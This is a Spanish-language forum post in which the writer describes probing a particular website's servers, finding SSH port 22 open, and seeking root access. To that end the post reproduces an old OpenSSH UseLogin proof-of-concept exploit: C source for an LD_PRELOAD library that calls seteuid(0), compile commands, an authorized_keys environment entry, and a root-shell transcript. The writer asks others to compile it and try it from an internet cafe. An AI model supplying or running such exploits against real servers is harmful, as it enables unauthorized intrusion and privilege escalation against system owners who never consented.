Bueno aunque nadie parece seguir trabajando en este tema yo sigo intentando obtener el acceso al servidor.
Recapitulando un poko le hicimos un whois a la famos pagina y vimos que teniamos dos servidores detras que tenian el puerto 22 abierto este puerto es el de remote login protocol hice mis indagaciones y tiene la version 1.99 que es bastante antigua, creo que se habla de 2.4 o 3.4 en la actualidad. Encontre un exploit que nos permite acceso de root en el servidor para una version superior por lo que cabe la posibilidad de que funcione con esta version pero como ahora mismo no tengo compilador ni linux instalado no lo he podido compilar ni ejecutar pero lo voy a postear para que alguien lo compile y si puede lo pruebe desde algun cyber.
--[ OpenSSH UseLogin bug proof of concept exploit ]--
by [WaR] <[email protected]> / http://www.genhex.org
--[ Intro ]--
I was very curious in finding out how to exploit this problem. Although
I don't think anyone uses this feature, I looked into the matter anyway.
Here it goes. It was tested on the following platforms:
- Slackware 7.1 with OpenSSH3.0p1
- RedHat 7.1 with OpenSSH_2.9p2
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
The exploit should work as long as UseLogin does. YMMV.
This is based on libroot from [email protected],
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
you thought it wouldn't happen again...).
Kudos to [email protected] for his help figuring out the problem with
the Slackware UseLogin, testing on OpenBSD, and giving the ideia for
the seteuid(0) (it originally was a system("/bin/sh").
--[ Code ]--
Create a lib.c file with the next content:
---8<---
#include <stdio.h>
int setuid(int uid){
printf("setuid() called...\n");
seteuid(0);
}
---8<---
Compile it into a library:
gcc -c -o lib.o lib.c
ld -shared -o libroot.so lib.o
chmod 755 ./libroot.so
Now, for the tricky (*g*) part...
You must have an account on the machine, and create an entry
on $HOME/.ssh/authorized_keys (or authorized_keys2) with:
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>
When sshd receives your connection, it will export this variable
into the environment *BEFORE* running login. Somewhere after this,
it executes a setuid. When it does, it makes a seteuid(0).
$ id
uid=1000(war) gid=100(users) groups=100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=0(root) gid=100(users) groups=100(users)
It also works remotely. Anyway, you _MUST_ have an account on
the victim machine so you can setup the enviroment, and login.
And obviously (duh) it must have UseLogin enabled.
That's all.
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.
-- [WaR]
"If you can't hack it, hit it with a hammer"
Espero que esto sirva de algo y que a su vez alguien pueda ilustrarno con los resultados obtenidos.
Marcadores